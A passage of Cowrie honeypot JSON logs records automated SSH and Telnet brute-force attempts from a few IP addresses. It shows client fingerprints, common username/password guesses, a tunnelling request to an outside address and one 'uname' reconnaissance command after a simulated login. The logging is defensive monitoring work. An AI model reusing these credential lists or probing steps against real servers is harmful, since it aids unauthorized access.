penssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:41:04.310709Z","src_ip":"212.227.125.160","session":"b7c2b48210f3"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-31T00:41:04.605661Z","src_ip":"212.227.125.160","session":"b7c2b48210f3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:05.769163Z","src_ip":"212.227.125.160","session":"b7c2b48210f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48468,"dst_ip":"1.2.3.4","dst_port":22,"session":"a491aa9ec913","protocol":"ssh","message":"New connection: 212.227.125.160:48468 (1.2.3.4:22) [session: a491aa9ec913]","sensor":"my-vps","timestamp":"2025-08-31T00:41:13.551269Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:13.552950Z","src_ip":"212.227.125.160","session":"a491aa9ec913"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48727,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7a0218e3744","protocol":"ssh","message":"New connection: 212.227.125.160:48727 (1.2.3.4:22) [session: d7a0218e3744]","sensor":"my-vps","timestamp":"2025-08-31T00:41:13.666609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:13.667349Z","src_ip":"212.227.125.160","session":"d7a0218e3744"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T00:41:13.782191Z","src_ip":"212.227.125.160","session":"d7a0218e3744"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.127431Z","src_ip":"212.227.125.160","session":"d7a0218e3744"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.246284Z","session":"d7a0218e3744"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61064,"dst_ip":"1.2.3.4","dst_port":22,"session":"db8512b86742","protocol":"ssh","message":"New connection: 217.72.205.35:61064 (1.2.3.4:22) [session: db8512b86742]","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.561664Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.562874Z","src_ip":"217.72.205.35","session":"db8512b86742"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34740,"dst_ip":"1.2.3.4","dst_port":22,"session":"37f9cabfb8f6","protocol":"ssh","message":"New connection: 212.227.125.160:34740 (1.2.3.4:22) [session: 37f9cabfb8f6]","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.634637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.635818Z","src_ip":"212.227.125.160","session":"37f9cabfb8f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.710437Z","src_ip":"212.227.125.160","session":"37f9cabfb8f6"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-31T00:41:14.948608Z","src_ip":"212.227.125.160","session":"37f9cabfb8f6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:16.108901Z","src_ip":"212.227.125.160","session":"37f9cabfb8f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34836,"dst_ip":"1.2.3.4","dst_port":22,"session":"a32352feeef5","protocol":"ssh","message":"New connection: 212.227.125.160:34836 (1.2.3.4:22) [session: a32352feeef5]","sensor":"my-vps","timestamp":"2025-08-31T00:41:24.957972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:24.958877Z","src_ip":"212.227.125.160","session":"a32352feeef5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:41:25.032923Z","src_ip":"212.227.125.160","session":"a32352feeef5"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:41:25.254234Z","src_ip":"212.227.125.160","session":"a32352feeef5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:41:25.596971Z","src_ip":"212.227.125.160","session":"a32352feeef5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:41:25.597772Z","src_ip":"212.227.125.160","session":"a32352feeef5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:25.675439Z","src_ip":"212.227.125.160","session":"a32352feeef5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:25.676588Z","src_ip":"212.227.125.160","session":"a32352feeef5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50022,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd459f4bddd","protocol":"ssh","message":"New connection: 212.227.235.229:50022 (1.2.3.4:22) [session: ffd459f4bddd]","sensor":"my-vps","timestamp":"2025-08-31T00:41:25.973274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:41:25.974127Z","src_ip":"212.227.235.229","session":"ffd459f4bddd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:41:26.275143Z","src_ip":"212.227.235.229","session":"ffd459f4bddd"}
{"eventid":"cowrie.login.failed","username":"ls","password":"Aadmin@1@2@3","message":"login attempt [ls/Aadmin@1@2@3] failed","sensor":"my-vps","timestamp":"2025-08-31T00:41:27.521887Z","src_ip":"212.227.235.229","session":"ffd459f4bddd"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:28.824645Z","src_ip":"212.227.235.229","session":"ffd459f4bddd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56608,"dst_ip":"1.2.3.4","dst_port":22,"session":"e41a4cce3913","protocol":"ssh","message":"New connection: 212.227.235.229:56608 (1.2.3.4:22) [session: e41a4cce3913]","sensor":"my-vps","timestamp":"2025-08-31T00:41:30.983570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:33.041558Z","src_ip":"212.227.235.229","session":"e41a4cce3913"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:41:33.042301Z","src_ip":"212.227.235.229","session":"e41a4cce3913"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39788,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8ee5c8080c5","protocol":"ssh","message":"New connection: 212.227.125.160:39788 (1.2.3.4:22) [session: e8ee5c8080c5]","sensor":"my-vps","timestamp":"2025-08-31T00:41:35.369143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:35.369963Z","src_ip":"212.227.125.160","session":"e8ee5c8080c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:41:35.443185Z","src_ip":"212.227.125.160","session":"e8ee5c8080c5"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:41:35.663912Z","src_ip":"212.227.125.160","session":"e8ee5c8080c5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:36.816196Z","src_ip":"212.227.125.160","session":"e8ee5c8080c5"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"123456","message":"login attempt [daemon/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:41:37.728259Z","src_ip":"212.227.235.229","session":"e41a4cce3913"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:39.455619Z","src_ip":"212.227.235.229","session":"e41a4cce3913"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56902,"dst_ip":"1.2.3.4","dst_port":22,"session":"8421f7b64b4c","protocol":"ssh","message":"New connection: 212.227.125.160:56902 (1.2.3.4:22) [session: 8421f7b64b4c]","sensor":"my-vps","timestamp":"2025-08-31T00:41:45.761696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:45.762645Z","src_ip":"212.227.125.160","session":"8421f7b64b4c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:41:45.836396Z","src_ip":"212.227.125.160","session":"8421f7b64b4c"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:41:46.085112Z","src_ip":"212.227.125.160","session":"8421f7b64b4c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:41:47.249229Z","src_ip":"212.227.125.160","session":"8421f7b64b4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46750,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf47f0579495","protocol":"telnet","message":"New connection: 212.227.125.160:46750 (1.2.3.4:23) [session: bf47f0579495]","sensor":"my-vps","timestamp":"2025-08-31T00:41:52.142004Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47502,"dst_ip":"1.2.3.4","dst_port":22,"session":"436c632a7306","protocol":"ssh","message":"New connection: 212.227.125.160:47502 (1.2.3.4:22) [session: 436c632a7306]","sensor":"my-vps","timestamp":"2025-08-31T00:41:53.772116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:54.319604Z","src_ip":"212.227.125.160","session":"436c632a7306"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:41:54.320354Z","src_ip":"212.227.125.160","session":"436c632a7306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35998,"dst_ip":"1.2.3.4","dst_port":22,"session":"f094748a0af2","protocol":"ssh","message":"New connection: 212.227.125.160:35998 (1.2.3.4:22) [session: f094748a0af2]","sensor":"my-vps","timestamp":"2025-08-31T00:41:56.211012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:56.211980Z","src_ip":"212.227.125.160","session":"f094748a0af2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:41:56.286837Z","src_ip":"212.227.125.160","session":"f094748a0af2"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:41:56.560291Z","src_ip":"212.227.125.160","session":"f094748a0af2"}
